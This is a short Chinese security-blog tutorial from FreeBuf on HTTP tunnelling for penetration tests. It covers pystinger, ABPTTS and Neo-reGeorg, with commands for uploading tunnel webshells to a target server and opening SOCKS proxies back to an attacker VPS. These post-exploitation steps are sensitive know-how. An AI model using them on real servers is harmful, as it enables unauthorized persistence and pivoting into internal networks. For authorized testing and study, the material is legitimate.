官方公众号企业安全新浪微博
FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。
FreeBuf+小程序
HTTP隧道代理
橘子爱吃橙子- 关注
0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9
HTTP隧道代理
本文由
橘子爱吃橙子 创作,已纳入「FreeBuf原创奖励计划」,未授权禁止转载
HTTP隧道代理
pystinger隧道(socks4a)
1.上传proxy.jsp到目标服务器,确保可以正常访问。
2.上传stinger_server.exe 到目标服务器,并start命令运行该程序
start stinger_server.exevps 运行client端
./stinger_client -w http://example.com/proxy.jsp -l 0.0.0.0 -p 60000
将会在vps的6000端口启用socks4a代理
Adptts代理
1.生成webshell:
python abpttsfactory.py -owebshell2.将生成的木马上传至目标靶机,出现一串hash即为成功
3..攻击机执行:
#将靶机的端口映射出来为攻击机本地端口
#攻击机地址和靶机地址通常设置为127.0.0.1
python abpttsclient.py -c webshell\config.txt -uurl地址 -f攻击机地址:攻击机端口/靶机地址:靶机端口
Neo-reGeorg(socks5)
1.设置密码,生成tunnel的webshell,并上传到目标服务器。
python neoreg.py generate -k 自定义密码2.使用neoreg.py连接webshell,并在本地建立socks代理
python neoreg.py -k 密码 -u http://example.xx/tunnel.*(php/jsp/asp) -p 自定义端口
免责声明
1.一般免责声明:本文所提供的技术信息仅供参考,不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》,作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。
2. 适用性声明:文中技术内容可能不适用于所有情况或系统,在实际应用前请充分测试和评估。若因使用不当造成的任何问题,相关方不承担责任。
3. 更新声明:技术发展迅速,文章内容可能存在滞后性。读者需自行判断信息的时效性,因依据过时内容产生的后果,作者及发布平台不承担责任。
橘子爱吃橙子
这家伙太懒了,还未填写个人描述!
已在FreeBuf发表 3 篇文章
本文为 橘子爱吃橙子 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
渗透实战优质工具
相关推荐
橘子爱吃橙子 LV.2
这家伙太懒了,还未填写个人描述!
- 3 文章数
- 5 关注者
SSTI注入
2021-11-19
浅谈文件包含漏洞
2021-06-17